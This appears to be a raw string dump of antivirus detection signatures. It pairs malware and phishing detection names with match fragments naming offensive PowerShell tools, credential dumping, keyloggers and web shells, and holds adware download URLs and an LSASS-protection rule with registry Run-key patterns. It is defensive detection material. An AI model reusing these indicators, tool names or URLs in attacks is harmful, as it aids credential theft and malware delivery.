!#SCRIPT:ContainsClassCode.B publicclass !#SCRIPT:Exploit:JS/AimesuL4 paramvalue=\"dyy !#SCRIPT:HTML/TechMsgCall.AE calltechsupport !#SCRIPT:HTML/TechMsgCall.AH contactcustomer !#SCRIPT:JS/VariableWithMZ.A =\"4d5a !#SCRIPT:PHP/PotentialWS.WSH escapeshellcmd( !#SCRIPT:PSCommonArtifacts.F functioninvoke- !#SCRIPT:Powershell/SQLAgent get-sqlagentjob !#TEL:SCPT_LCSuspiPSPattern6 get-vulnschtask !#BRUTE:LNK:Expert:Feature:82 .open(\"ge !#SCPT:Nemucod_Obfuscator_A!D .type= !#SCPT:Nemucod_Obfuscator_A!E .close(); !#SCPT:PossibleBase64MZHeader =\"tvqqaamaaaae !#SCPT:SuspiciousJAVAfilename siparisler.jar !#SCPT:Trojan:JS/Bardungos.A3 1.49621490834e !#SCPT:Trojan:JS/Bardungos.A4 collectgarbage .createthread( .dispcallfunc( .enumpropsexa( .enumpropsexw( this.hj48kme() !#SCRIPT:ASP/PotentialWS.WSH1 objshell.exec( !#SCRIPT:Exploit:JS/LikySlr-3 transformnode( !#SCRIPT:HasString_XajaxLib.C ==typeofxajax) !#SCRIPT:PowerShell/PsRunFile .vbs\"&& !#SCRIPT:Trojan:JS/PDFEmbedA3 ="http:// +=';';function !#TEL:SCPT_LCSuspiPSPattern30 start-agentjob !#TEL:SCPT_LCSuspiPSPattern39 portscan-alive !#TEL:SCPT_LCSuspiPSPattern59 get-chromedump !#TEL:SCPT_LCSuspiPSPattern65 get-keystrokes !#TEL:SCPT_LCSuspiPSPattern78 invoke-gofetch !#TEL:SCPT_LCSuspiPSPattern90 invoke-inveigh !#Trojan:AutoIt/Inject.F9!MTB $return=$e($b( !#Worm:VBS/Jenxcus.DB.isready (is-ready,(\"\") !#SCPT:MacroDownloadExe.B!amsi stream.write( !#SCPT:Phish:PHP/Phishmul.GA12 <formaction=\" !#SCPT:Phish:PHP/Phishmul.GA15 powerxrangers !#SCPT:Phish:PHP/Phishmul.GG19 \"cyveillance\" !#SCPT:Trojan:Win32/WinLNK.DR1 mshta.exel-kc !#SCPT:VBS/Bloodhound.ARF1!MTB executeglobal !#SCRIPT:Exploit:SWF/Netis.E-3 regexpreplace !#SCRIPT:Exploit:SWF/Netis.Z-3 flash.display !#SCRIPT:Exploit:Win32/DatLis4 offsetparent= !#SCRIPT:HTML/TechMsgEvents.AS mayhaveavirus !#SCRIPT:HTML/TechMsgEvents.AX couldriskyour !#SCRIPT:HTML/TechMsgEvents.AY computermaybe !#SCRIPT:HTML/TechMsgEvents.AZ maybeinfected !#SCRIPT:HTML/TechMsgEvents.BD duetopossible !#SCRIPT:HTML/TechMsgEvents.BH stealordelete !#SCRIPT:HTML/TechMsgSubject.E mailpasswords !#SCRIPT:HTML/TechMsgSubject.H privatephotos !#SCRIPT:PHP/GetHostByAddr!MTB gethostbyaddr !#SCRIPT:UsernameFileName.A!js %username%.js .bankinter.es .ingdirect.es paypal.com.br privatbank.ua serasa.com.br !#TEL:SCPT_LCSuspiPSPattern106 copy-sections !#TEL:SCPT_LCSuspiPSPattern137 portscan-port !#TEL:SCPT_LCSuspiPSPattern170 parse-ipports !#TEL:SCPT_LCSuspiPSPattern199 invoke-psgcat !#TEL:SCPT_LCSuspiPSPattern205 get-passhints !#Worm:VBS/Jenxcus.Neroz!Lowfi neroz=n3roz(\" sellerrulez! !#AsrOfficeExecContentBypass.P1 !#BRUTE:JAMSI:Expert:Feature:62 -windowstyle !#BRUTE:JAMSI:Expert:Feature:82 ,\"\",\"\",\"0\"); !#BRUTE:JAMSI:Expert:Feature:93 !#BRUTE:OOXML:Expert:Feature:18 <v:imagedata !#BRUTE:OOXML:Expert:Feature:19 <o:oleobject !#BRUTE:OOXML:Expert:Feature:20 type=\"embed\" !#BRUTE:SCHTSK:Expert:Feature:5 <principals> !#SCPT:Autorun.execute.actntext action= !#SCPT:Exploit.JS.Axpergle.CE.2 ='kex'.+'ec' !#SCPT:Exploit:HTML/Tronlex.A.2 --no-sandbox =math.floor; !#SCPT:Exploit:JS/Neclu_obffrag l*e@n@g*t-h@ !#SCPT:Exploit:PDF/Ticanoti.CS5 .join(\\\"\\\")) !#SCPT:JsMethodFunc_arraybuffer arraybuffer( !#SCPT:JsMethodFunc_uint16array uint16array( !#SCPT:JsMethodFunc_uint32array uint32array( !#SCPT:Phish:PHP/Allowfrmall.GG allowfromall /notify.php? !#SCPT:Trojan:VBS/SLoad.PA!Pra2 !#SCPT:Trojan:VBS/SLoad.PB!Pra3 .savetofilew viewthisfile ]+number+_0x !#SCRIPT:Python/ShellBot.D1!MTB [0]==\"exec\": !#SCRIPT:StringRecycleBinFolder $.recyclebin !#SCRIPT:WinApis_VirtualAlloc.D !#SCRIPTLOWFI:BankerProxy.proxy return\"proxy yxorp !#Script:Phish:PHP/ScamPage!MTB --scampage-- !#Script:Phish:PHP/VoiceMsg!MTB ---by*b0y--- !#Trojan:BAT/AVDisabler.A!atb05 rutg.exe/run !#Trojan:PowerShell/Sldscr_dhs2 \"wireshark*\" !#BRUTE:SCHTSK:Expert:Feature:44 )8 !#BRUTE:SCHTSK:Expert:Feature:44 !#BRUTE:SCHTSK:Expert:Feature:69 )8 !#BRUTE:SCHTSK:Expert:Feature:69 !#SCPT:Backdoor:Perl/Dirtelti.P2 )8 !#SCPT:Backdoor:Perl/Dirtelti.P2 return\"fuck !#SCPT:Java/AdwindOddClassName.A )8 !#SCPT:Java/AdwindOddClassName.A main/ !#SCPT:Java/AdwindOddClassName.B )8 !#SCPT:Java/AdwindOddClassName.B !#SCPT:Java/AdwindOddClassName.C )8 !#SCPT:Java/AdwindOddClassName.C )8 !#SCPT:PowerShell/EncodedCommand pwsh pwsh )8 !#SCPT:PowerShell/NonInteractive pwsh !#SCPT:Trojan:JS/Obfuse.RVD6!MTB )8 !#SCPT:Trojan:JS/Obfuse.RVD6!MTB return\\\"{2} !#SCPT:Trojan:VBS/Obfuse.RV2!MTB )8 !#SCPT:Trojan:VBS/Obfuse.RV2!MTB wckr=chr(k) !#SCPT:TrojanSpy:JS/BrobanDel.A5 )8 !#SCPT:TrojanSpy:JS/BrobanDel.A5 brasil|hsbc !#SCRIPT:PowerShell/Credphishlog )8 !#SCRIPT:PowerShell/Credphishlog :tmp $;if( !#Trojan:Win32/Nanocore.FC12!MTB )8 !#Trojan:Win32/Nanocore.FC12!MTB 2e626174\")) !#Worm:VBS/Jenxcus.Recoder!Lowfi )8 !#Worm:VBS/Jenxcus.Recoder!Lowfi '<[recoder: !!#SCPT:Backdoor:PHP/cookiejack.GG )8!!#SCPT:Backdoor:PHP/cookiejack.GG cookiejack !!#SCPT:Backdoor:PHP/ensikology.GG )8!!#SCPT:Backdoor:PHP/ensikology.GG ensikology !!#SCPT:Exploit:HTML/Axpergle.AH.2 )8!!#SCPT:Exploit:HTML/Axpergle.AH.2 &exec= !!#SCPT:GeneralityExploitStrRare.S )8!!#SCPT:GeneralityExploitStrRare.S !!#SCPT:Nemucod_exclusion.lib_load )8!!#SCPT:Nemucod_exclusion.lib_load |lib_load| !!#SCPT:Nemucod_exclusion.writelog )8!!#SCPT:Nemucod_exclusion.writelog |writelog| !!#SCPT:Phish:PHP/TA_realcarder.GG )8!!#SCPT:Phish:PHP/TA_realcarder.GG realcarder !!#SCPT:Trojan:VBS/Obfuse.HBS3!MTB )8!!#SCPT:Trojan:VBS/Obfuse.HBS3!MTB =\"h\"&\"ell\" !!#SCPT:Trojan:VBS/Obfuse.HBS8!MTB )8!!#SCPT:Trojan:VBS/Obfuse.HBS8!MTB ox.runok,0 !!#SCRIPT:Exploit:HTML/Meercat.E-1 )8!!#SCRIPT:Exploit:HTML/Meercat.E-1 todaystats !!#SCRIPT:Exploit:HTML/Meercat.I-4 )8!!#SCRIPT:Exploit:HTML/Meercat.I-4 noreferer: !!#SCRIPT:Exploit:HTML/Meercat.M-1 )8!!#SCRIPT:Exploit:HTML/Meercat.M-1 traffadmin !!#SCRIPT:Exploit:HTML/Meercat.N-3 )8!!#SCRIPT:Exploit:HTML/Meercat.N-3 threadname !!#SCRIPT:JS/BlacoleRefLowfi.Frag1 )8!!#SCRIPT:JS/BlacoleRefLowfi.Frag1 }catch(q){ !!#SCRIPT:PowerShell/Macroburst.B4 )8!!#SCRIPT:PowerShell/Macroburst.B4 /tags/list !!#Trojan:BAT/CryptReplDow.AF5!MTB )8!!#Trojan:BAT/CryptReplDow.AF5!MTB timeout/t1 !!#TrojanDownloader:VBS/GootKitsd5 )8!!#TrojanDownloader:VBS/GootKitsd5 \"!#SCPT:EnvVarCharReplacement.Clean )8\"!#SCPT:EnvVarCharReplacement.Clean \\microsa\\ ninitepro \"!#SCPT:GeneralityExploitStrRare.AT )8\"!#SCPT:GeneralityExploitStrRare.AT sbxescape )8\"!#SCPT:JS/Obfuscator.Split.MSXML.A l2.xmlh\"; )8\"!#SCRIPT:LoadWin32importsfromMacro lib\"ntdll #!#Exploit:VBS/CVE-2018-8174.A!atb01 )8#!#Exploit:VBS/CVE-2018-8174.A!atb01 ()+69596 #!#SCPT:Backdoor:ASP/Dirtelti.F1!MTB )8#!#SCPT:Backdoor:ASP/Dirtelti.F1!MTB aspshell #!#SCPT:Backdoor:ASP/Dirtelti.J3!MTB )8#!#SCPT:Backdoor:ASP/Dirtelti.J3!MTB hackwolf #!#SCPT:Backdoor:ASP/Dirtelti.J4!MTB )8#!#SCPT:Backdoor:ASP/Dirtelti.J4!MTB file_del #!#SCPT:Backdoor:ASP/Dirtelti.J5!MTB )8#!#SCPT:Backdoor:ASP/Dirtelti.J5!MTB file_att #!#SCPT:Backdoor:PHP/Dirtelti.A7!MTB )8#!#SCPT:Backdoor:PHP/Dirtelti.A7!MTB =explode #!#SCPT:Backdoor:PHP/Dirtelti.C3!MTB )8#!#SCPT:Backdoor:PHP/Dirtelti.C3!MTB getcwd() #!#SCPT:GeneralityExploitStrCommon.B )8#!#SCPT:GeneralityExploitStrCommon.B ropchain #!#SCPT:GeneralityExploitStrCommon.I )8#!#SCPT:GeneralityExploitStrCommon.I oobr #!#SCPT:GeneralityExploitStrCommon.X )8#!#SCPT:GeneralityExploitStrCommon.X )8#!#SCPT:JS/Obfuscator.HexMixed.cmd.A \\u0063md c\\u006dd cm\\u0064 )8#!#SCPT:JS/Obfuscator.HexMixed.run.A \\u0052un r\\u0075n #!#SCPT:JS/Obfuscator.Hex )8#!#SCPT:JS/Obfuscator.Hex y.*NT >1rcF SDa8l4q \\Oursurfing.exe -silence -ptid= &bundle=Component&product=Oursurfing&status= \\luckysearchesSoftware\\luckysearcheshp \\luckysearchesSoftware\\luckysearcheshpx \\bin\\pxdl.pdb {9CEE239D-2901-4D60-AE9E-25CDA88D47E2} %s/%s/%s?action=%s %s -ptid=%s eUpgrade\\eupgrade.exe -enablebho -bhoid={ \\MiuiTab \\ProtectService.exe sc delete IePluginServices \\SupTab\\SupTab.dll \\MiniLite \\searchProvider.xml SOFTWARE\\WdsManPro {262E20B8-6E20-4CEF-B1FD-D022AB1085F5} MangerProtect WdsManPro mini_zip update0=ref,%s&update1=nation,%s&update2=language,%s \\TMain\\Release\\SvrUpdater.pdb \\TMain\\Release\\TSvr.pdb TSvr.cfig SVR: I will exit..... Manages network policy and network policy notification delivery for TSv.com. /sof-installer/%s?action1=xa.geoip&action2=visit \\InstallerMainV6_Yrrehs\\Release\\Main.pdb Main_t00ls_Yrrehs /%s?action=%s.dlzip \\I\\conf .%s.finish \\I\\tmp II.zip \\I\\tmpII.zip %d%02d%02d%02d%02d%02d II.zip\\I \\SearchProtect\\Bin\\Release\\CmdShell.pdb 1F4C6304-865F-41EA-B18C-DB10B5F77DF5 5F26509F-29FE-4598-8800-FA22CE9CC17F HPNotify.exe -run -ptid=%s %sconf \\SearchProtect\\bin\\Release\\HPNotify.pdb &ts=%d&from=xtab&uid=%s /searchprotect/%s?action SUPDuiWindow %s%s?action=browser.%s.prevent.homepage.%s \\Release\\SFKEX.pdb \\x64\\Release\\SFKEX64.pdb Yrrehs.exe t00ls_Y[S t00l_Yrrehs_EX_ /logic/z.php xa.xingcloud.com/v4/sof-everything/ xingcl oud.com/v4/ sof-every thing/ xingcloud.com/v4/sof-everything/ \\SFKEX.dll e_SetDefaultSearch e_SetHomePage \\SearchProtect\\Bin\\Release\\BrowerWatch I will exit watching thread. \\SearchProtect\\Bin\\Release\\IeWatchDog.pdb \\bin\\BrowserAction_MD.pdb /searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s 2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D \\SearchProtect\\Bin\\Release\\ProtectService.pdb cmdshell.exe IHProtectUpDate SOFTWARE\\IHProtect IHProtectPlugin SUhQcm90ZWN0UGx1Z2lu /sof-installer/%s?action=%s.uninstall.%s UninstallManager will be removed, are you sure to continue? \\SupTab\\ Dlg2.xml <Option name=\"HpProtect\" Windows Protect Manager \\extensions\\defsearchp@gmail.com\\install.rdf \\SupNewTab\\bin\\SupTab.pdb 2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0 BFAC251F-FE56-45F9-B134-2CD7DCBF8EE0 /sof-ient/%s?action no load urlmon.dll install_ie t00lHOM \\SSFK\\Release\\SSFK.pdb \\supsoft\\WPM2.0\\Release\\ReportDll.pdb /sof-everything/%s?action Everything.exe TheradTask::Stop:%d:%d:%d http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip \\net_search\\ /everything/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s SFKEX64.exe SFKEX.exe -silence -ptid=%s /sof-installer/%s?action=%s \\conf -force -type=%d -innerptid=%s -mver=%s %s -force -type=%s -innerptid=%s -mver=%s %s FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp -force -type= ?action=%s.dlzip1.%s.finish,%d 160DD503-E139-4E78-AB29-79A839E404BE -innerptid=%s -mver=%s Zero-tmp /%s/1/%s/2 /%s/1 /%s/2 123b.zip 456b.zip 849E93D6-4D33-4AAD-A4FD-42A14F13FA00 Upgrade Wizar d QDo6HRFDF0MhQ2dT D$HPj ..\\DataBase ..\\DataBaseDoWork uninstallDlg2.xml LWZvcmNlICAtdHlwZT0xIC1pbm5lcnB0aWQ9 ..\\test ..\\testDoWork ..\\mainup ..\\mainupDoWork I s t he Latest Version! p-\tAtL $Rq` {wV$, yfn+5N* c;s,i, #gU|@h T,;gCd .lEyJ !J'?R \\WPM` #\\WPM` \\SFK` &\\SFK` \\STab` &\\STab` \\XTab` &\\XTab` \\qone8` \\2WdM2` #\\2WdM2` \\6WdM6` #\\6WdM6` \\7WdM7` #\\7WdM7` \\corss` #\\corss` \\cosun` #\\cosun` \\lWdMl` #\\lWdMl` \\yWdMy` #\\yWdMy` \\TData`\t &\\TData`\t \\SupTab`\t \\4winp4`\t \\update`\t \\RayDld`\t \\SupTab` \\SupTab`\t#\\4winp4`\t#\\update`\t&\\RayDld`\t&\\SupTab` \\vi-view` \\Tmp0x0x` \\MiuiTab` #\\Tmp0x0x` &\\MiuiTab` \\aartemis` \\key-find` \\MiniLite` &\\MiniLite` \\TDataDld` &\\TDataDld` \\awesomehp` \\do-search` \\istart123` \\omniboxes` (x86)\\SFK` & (x86)\\SFK` \\Everything` \\istartsurf` \\mysites123` \\omiga-plus` \\oursurfing` \\sweet-page` \\MWMiniProM` \\XWMiniProX` (x86)\\STab` (x86)\\XTab` #\\MWMiniProM` #\\XWMiniProX` & (x86)\\STab` & (x86)\\XTab` \\6WdsManPro6` #\\6WdsManPro6` \\FWdsManProF` #\\FWdsManProF` \\HWdsManProH` #\\HWdsManProH` \\SWdsManProS` #\\SWdsManProS` \\UWdsManProU` #\\UWdsManProU` \\vWdsManProv` #\\vWdsManProv` (x86)\\TData` & (x86)\\TData` \\webssearches` (x86)\\RayDld` & (x86)\\RayDld` \\istartpageing` \\luckysearches` \\mystartsearch` \\yoursearching` (x86)\\MiuiTab` & (x86)\\MiuiTab` (x86)\\MiniLite` & (x86)\\MiniLite` (x86)\\TDataDld` & (x86)\\TDataDld` \\Corner Sunshine` \\IHProtectUpDate` #\\IHProtectUpDate` &\\Corner Sunshine` \\IePluginServices` #\\IePluginServices` \\WindowsMangerProtect` #\\WindowsMangerProtect` (x86)\\Corner Sunshine] & (x86)\\Corner Sunshine] SoftwareBundler:Win32/Bestof I-b,g exe.ac_tobm_putes ezitenoma/ogsart moc.sutaicsafsuibocemrym //VERYSILENT {tmp}\\inst.exe {tmp}\\inst.exe] !Killav.HI BrowserModifier:Win32/Omniboxes!blnk $BrowserModifier:Win32/Omniboxes!blnk RPF:IS_CMDEmbedded&SCPT:BrowserModifier:Win32/Omniboxes!blnk @<RPF:IS_CMDEmbedded&SCPT:BrowserModifier:Win32/Omniboxes!blnk txjs? BrowserModifier:Win32/WWWSearching!blnk 'BrowserModifier:Win32/WWWSearching!blnk RPF:IS_CMDEmbedded&SCPT:BrowserModifier:Win32/WWWSearching!blnk] C?RPF:IS_CMDEmbedded&SCPT:BrowserModifier:Win32/WWWSearching!blnk] SoftwareBundler:Win32/Fourthrem SoftwareBundler:Win32/FourthremL@ _mb.exe?mid= 4_mb.exe?mid= .exe?mid= _mb.exe?msapp= 4_mb.exe?msapp= _a11.exe _a11.exe?msapp= _nj.exehttp:// 4_nj.exehttp:// @_nj.exe?msidreq= _cr.exehttp:// _bb.exehttp://2ndrequest.me/ 5_bb.exehttp://2ndrequest.me/ @_bb.exe?aleatokenid= _br.exe?dummyid= 6_br.exe?dummyid= _nj.exe?dummyid= _mb.exe?msid= 6_mb.exe?msid= .exe?msid= trackpixl.com/010914s/010914i.htmshowwebinpopup6error 7trackpixl.com/010914s/010914i.htmshowwebinpopup6error _mb.exe?idket= 8_mb.exe?idket= .exe?idket= _mb.exe?kitkatid= :_mb.exe?kitkatid= _a10.exe _a10.exe?kitkatid= _a11.exe?kitkatid= _mb.exe?tkt= ;_mb.exe?tkt= _mb_1.exe\\ _is.exehttp:// _is.exe?tkt= _mb.exe?msappid= <_mb.exe?msappid= .exe?msappid= -silence-ptid=pcm\\ ?-silence-ptid=pcm\\ _o.exehttp:// _o.exe? _br.exehttp:// _mb.exe?token= ?_mb.exe?token= @_mb_1.exe\\ _is.exehttp:// _is.exe?token= _mb.exe?asusdelta= @_mb.exe?asusdelta= .exe?asusdelta= _mb.exe?microsoft= @_mb.exe?microsoft= .exe?microsoft= _mb.exe?jsession= C_mb.exe?jsession= _mb.exe\\ _ie.exe?jsession= _mb.exe?session= C_mb.exe?session= _is.exe?session= {b853e835-9f24-4f4b-b55c-e554d15cccd2} D{b853e835-9f24-4f4b-b55c-e554d15cccd2} @_ps.exehttp:// @_ps.exe? _mb.exe?chromefdp= F_mb.exe?chromefdp= _has.exe\\ _is.exe?chromefdp= _mb.exe?phpsessid= F_mb.exe?phpsessid= _is.exe?phpsessid= _mb.exe?requestcookie= N_mb.exe?requestcookie= _is.exe?requestcookie= _mb.exe?windowsappinstall= P_mb.exe?windowsappinstall= .exe?windowsappinstall= _mb.exe?essaporranaoehvirus R_mb.exe?essaporranaoehvirus .exe?essaporranaoehvirus _t3.exehttp:// Z_t3.exehttp:// @_t3.exe?aleatokenid= _t3.exe/ @key_local_machine\\software\\istartsurf 4threquest.me/ b4threquest.me/ 0_mb.exe?token= 0_is.exehttp://www.4threquest.me/ 0_is.exe?token= e4threquest.me/ _mb.exe?tkmswintokenrequestxmlhttp= _mb_1.exe @_is.exehttp://www.4threquest.me/ _br.exe s_br.exe @_br.exe?requestid= _nj.exe nullsoftinstallsystemv2.46 _br.exehttp://www. u_br.exehttp://www. @_br.exe? 0-9a-z= v_br.exe @_br.exe?aspnetsessid= _br.exehttp://www.4threquest.me/310714d/310714_br.exe? a-z0-9\\ a-z0-9_nj.exehttp://www.4threquest.me/310714d/291014_nj.exe? a-z0-9\\nsweb.dllhttp://goo.gl/x7a4lcshowwebinpopuptaskkill-f-im a-z0-9_mb_1.exehttp://goo.gl/0ma6okopenhttp://goo.gl/0ma6okerror http://myredir.net/K_ [http://myredir.net/K_ http://polifile.co/ 10+http://polifile.co/ .exe?IDket= 84Yts QW~Yg J0sD\t SCRIPT:SoftwareBundler:Win32/Fourthrem.A-1&(SCRIPT:SoftwareBundler:Win32/Fourthrem.A-2|SCRIPT:SoftwareBundler:Win32/Fourthrem.A-3)] PUA:Win32/CrawlerToolbar PUA:IRST:Block:CrawlerToolbar PUA:Block:CrawlerToolbar&!PUA:Exception +'PUA:Block:CrawlerToolbar&!PUA:Exception PUA:ML:Blocked:CrawlerToolbar&!PUA:Exceptionz 0,PUA:ML:Blocked:CrawlerToolbar&!PUA:Exceptionz PUA:Win32/Tugspay PUA:IRST:Block:Tugspay PUA:Block:Tugspay&!PUA:Exception $ PUA:Block:Tugspay&!PUA:Exception PUA:ML:Blocked:Tugspay&!PUA:Exceptionz )%PUA:ML:Blocked:Tugspay&!PUA:Exceptionz PUA:Win32/Ogimant PUA:Block:Ogimant&!PUA:Exceptionz $ PUA:Block:Ogimant&!PUA:Exceptionz PUA:Win32/SquareNet PUA:Block:SquareNet&!PUA:Exceptionz &\"PUA:Block:SquareNet&!PUA:Exceptionz PUA:Win32/Somoto \t\t]< \t@H` % #:L$< MpCloudToVDMBloomFilter !#SLF:MpCloudToVDMBloomFilter.A F!#SLF:MpCloudToVDMBloomFilter.A !#SLF:MpCloudToVDMBloomFilterPUA.A o\"I!#SLF:MpCloudToVDMBloomFilterPUA.A !#SLF:MpCloudToVDMBloomFilterSlow.A q#J!#SLF:MpCloudToVDMBloomFilterSlow.A DCO_MpDisableFriendlySlowCheck SOAP:https://wdcp.microsoft.com/WdCpSrvc.asmxSOAP:https://wdcpalt.microsoft.com/WdCpSrvc.asmxREST:https://wdcp.microsoft.com/wdcp.svc/submitReportREST:https://wdcpalt.microsoft.com/wdcp.svc/submitReportz DCO_OneClickWDODisable DCO_MpClientPoolID 19b3cc206e0b b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 %b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 enghipscpy:blockexecution:b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 ?enghipscpy:blockexecution:b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 caf67f1f-2ab8-4d6b-9146-52ebe33baeba WIAD org test rule This is a Test HIPS Rule that exposes rule logic in audit mode to entire WIAD org RThis is a Test HIPS Rule that exposes rule logic in audit mode to entire WIAD orgz 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 Block credential stealing from the Windows local security authority subsystem (lsass.exe) ZBlock credential stealing from the Windows local security authority subsystem (lsass.exe) Windows Defender Exploit Guard detected an attempt to extract credentials from LSASS. VWindows Defender Exploit Guard detected an attempt to extract credentials from LSASS. @\t@@ %windir%\\system32\\lsass.exe %windir%\\system32\\WerFaultSecure.exe %%windir%\\system32\\WerFaultSecure.exe %windir%\\system32\\mrt.exe %windir%\\system32\\svchost.exe %windir%\\system32\\wbem\\WmiPrvSE.exe $%windir%\\system32\\wbem\\WmiPrvSE.exe %windir%\\SysWOW64\\wbem\\WmiPrvSE.exe $%windir%\\SysWOW64\\wbem\\WmiPrvSE.exe %programfiles(x86)%\\Microsoft Intune Management Extension\\ClientHealthEval.exe O%programfiles(x86)%\\Microsoft Intune Management Extension\\ClientHealthEval.exe %programfiles(x86)%\\Microsoft Intune Management Extension\\SensorLogonTask.exe N%programfiles(x86)%\\Microsoft Intune Management Extension\\SensorLogonTask.exe %programfiles(x86)%\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe o%programfiles(x86)%\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe %programfiles(x86)%\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnagent.exe O%programfiles(x86)%\\Cisco\\Cisco AnyConnect Secure Mobility Client\\vpnagent.exe %programfiles(x86)%\\Zoom\\bin\\CptHost.exe )%programfiles(x86)%\\Zoom\\bin\\CptHost.exe %programfiles(x86)%\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe A%programfiles(x86)%\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe %programfiles(x86)%\\Google\\Update\\GoogleUpdate.exe 3%programfiles(x86)%\\Google\\Update\\GoogleUpdate.exe %programfiles(x86)%\\Splunk\\bin\\splunkd.exe +%programfiles(x86)%\\Splunk\\bin\\splunkd.exe %programfiles%\\Avecto\\Privilege Guard Client\\DefendpointService.exe D%programfiles%\\Avecto\\Privilege Guard Client\\DefendpointService.exe %programfiles%\\Intel\\SUR\\QUEENCREEK\\x64\\esrv_svc.exe 5%programfiles%\\Intel\\SUR\\QUEENCREEK\\x64\\esrv_svc.exe %programfiles%\\Microsoft Monitoring Agent\\Agent\\HealthService.exe B%programfiles%\\Microsoft Monitoring Agent\\Agent\\HealthService.exe %programfiles%\\Microsoft Monitoring Agent\\Agent\\MOMPerfSnapshotHelper.exe J%programfiles%\\Microsoft Monitoring Agent\\Agent\\MOMPerfSnapshotHelper.exe %programfiles%\\Nexthink\\Collector\\Collector\\nxtsvc.exe 7%programfiles%\\Nexthink\\Collector\\Collector\\nxtsvc.exe %programfiles%\\Splunk\\bin\\splunkd.exe &%programfiles%\\Splunk\\bin\\splunkd.exe %windir%\\CCM\\CcmExec.exe %windir%\\CCM\\SensorLogonTask.exe !%windir%\\CCM\\SensorLogonTask.exe %windir%\\Temp\\*\\Extract\\TrolleyExpress.exe +%windir%\\Temp\\*\\Extract\\TrolleyExpress.exe %programdata%\\Citrix\\Citrix Receiver*\\TrolleyExpress.exe 9%programdata%\\Citrix\\Citrix Receiver*\\TrolleyExpress.exe %programdata%\\Citrix\\Citrix Workspace *\\TrolleyExpress.exe ;%programdata%\\Citrix\\Citrix Workspace *\\TrolleyExpress.exe %programfiles(x86)%\\Citrix\\Citrix Workspace *\\TrolleyExpress.exe A%programfiles(x86)%\\Citrix\\Citrix Workspace *\\TrolleyExpress.exe %temp%\\*\\Extract\\TrolleyExpress.exe $%temp%\\*\\Extract\\TrolleyExpress.exez \t_#LOWFI:Lua:ContextualDropFileOutlookExtBin \t_#LOWFI:Lua:ContextualDropFileOutlookExtBinU3* _#LOWFI:Lua:ContextualDropFileOutlookExtOffice _#LOWFI:Lua:ContextualDropFileOutlookExtOfficeU3 _#LOWFI:Lua:ContextualDropFileOutlookExtScript _#LOWFI:Lua:ContextualDropFileOutlookExtScriptz NU4l 2_#LOWFI:Lua:ContextualDropFileOutlookExtArchive 2_#LOWFI:Lua:ContextualDropFileOutlookExtArchiveU4 _#LOWFI:Lua:ContextualDropFileOutlookDefaultBin _#LOWFI:Lua:ContextualDropFileOutlookDefaultBinU7 0>_#LOWFI:Lua:ContextualDropFileOutlookDefaultScript 0>_#LOWFI:Lua:ContextualDropFileOutlookDefaultScriptU7 V_#LOWFI:Lua:ContextualDropFileOutlookDefaultOffice V_#LOWFI:Lua:ContextualDropFileOutlookDefaultOfficeU8%T _#LOWFI:Lua:ContextualDropFileOutlookDefaultArchive _#LOWFI:Lua:ContextualDropFileOutlookDefaultArchivez HKCU\\SOFTWARE2HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\\\*2HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\\\*EHKLM\\Software\\Microsoft\\Windows\\CURRENTVERSION\\Control Panel\\CPLs\\\\*DHKLM\\Software\\Microsoft\\Windows\\CURRENTVERSION\\Control Panel\\CPLs\\*GHKLM\\Software\\Microsoft\\Windows\\CURRENTVERSION\\Control Panel\\CPLs\\*\\\\*A(16777227),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\\*A(16777227),HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\\*E(16777227),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\\\\*E(16777227),HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\\\\*L(16777227),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCEEX\\*(1)\\\\*L(16777227),HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCEEX\\*(1)\\\\*I(16777227),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICES\\\\*I(16777227),HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICES\\\\*M(16777227),HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICESONCE\\\\*M(16777227),HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNSERVICESONCE\\\\*AHKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\Uninstall\\*(1)\\\\*AHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\Uninstall\\*(1)\\\\* (16777227),HKLM\\software\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\run\\\\* (16777227),HKCU\\software\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\run\\\\* (16777227),HKLM\\software\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonce\\\\* (16777227),HKCU\\software\\microsoft\\windows nt\\currentversion\\terminal 